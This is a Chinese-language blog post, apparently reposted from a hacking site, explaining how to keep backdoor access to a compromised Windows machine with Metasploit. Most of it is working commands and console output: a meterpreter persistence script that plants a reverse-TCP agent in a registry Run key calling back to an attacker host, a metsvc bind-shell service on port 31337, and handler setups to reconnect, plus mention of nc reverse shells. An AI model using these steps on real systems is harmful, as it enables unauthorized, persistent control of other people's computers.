Metasploit之建立backdoor一二

admin

102480
文章

87
评论

2021年4月3日19:23:55评论50 views字数 2087阅读6分57秒阅读模式

1.meterpreter自带脚本

方法1.run presistence

可以使用run presistence -h查看选项：

meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139 
[*] Running Persistance Script 
[*] Resource file for cleanup created at 
/root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc 
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 

LPORT=443 
[*] Persistent agent script is 609496 bytes long 
[+] Persistent Script written to C:WINDOWSTEMPzvlYoXnVYFbR.vbs 
[*] Executing script C:WINDOWSTEMPzvlYoXnVYFbR.vbs 
[+] Agent executed with PID 3272 
[*] Installing into autorun as HKCUSoftwareMicrosoftWindows 
CurrentVersionRunFCBCUBtLrzFY 
[+] Installed into autorun as HKCUSoftwareMicrosoftWindows 

CurrentVersionRunFCBCUBtLrzFY

可以看到添加启动是通过，添加注册表键值，启动的是vbs脚本的后门。

连接：

msf > use exploit/multi/handler 
msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
payload => windows/metsvc_bind_tcp 
msf  exploit(handler) > set LHOST 192.168.1.139 
LHOST => 192.168.1.139 
msf  exploit(handler) > set LPORT 443 
LPORT => 443 
msf  exploit(handler) > exploit 

[*] Started bind handler 
[*] Starting the payload handler...

默认没启动，目标机重启后，可以成功获得meterpreter shell

方法2.run metsvc

执行metsvc 脚本

meterpreter > run metsvc -A 
[*] Creating a meterpreter service on port 31337 
[*] Creating a temporary installation directory C:WINDOWSTEMP 

kqaqtcsWhBTbO... 
[*]  >> Uploading metsrv.dll... 
[*]  >> Uploading metsvc-server.exe... 
[*]  >> Uploading metsvc.exe... 
[*] Starting the service... 
   * Installing service metsvc 
* Starting service 
Service metsvc successfully installed. 

[*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...

新建的服务，加自启动（映像名称metsvc.exe，服务metsvc ），连接到后门：

msf > use exploit/multi/handler 
msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
payload => windows/metsvc_bind_tcp 
msf  exploit(handler) > set LPORT 31337 
LPORT => 31337 
msf  exploit(handler) > set RHOST 192.168.1.108 
RHOST => 192.168.1.108 
msf  exploit(handler) > exploit 

[*] Started bind handler 
[*] Starting the payload handler... 

meterpreter >

成功连接

2.自定义后门

方法1.上传远控

方法2.上传nc或其他反弹shell

BT5创建NC反弹型后门

摘自：http://zone.wooyun.org/content/2454

留言评论（旧系统）：

佚名 @ 2013-03-27 21:03:47

请问我有个一个webshell 我知道管理员用户名密码但是用 runas 等等之类的工具来继承权限执行命令失败听说 msf反弹回cmdshell 后直接继承用户权限执行命令请问是那个payload 求教下谢谢

本站回复：

msf 很多反弹模块，任意一个即可，但权限是继承的你执行权限，并不是什么用户权限。

文章来源于lcx.cc:Metasploit之建立backdoor一二

左青龙
微信扫一扫

右白虎
微信扫一扫

Metasploit之建立backdoor一二

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

发表评论

在线咨询

微信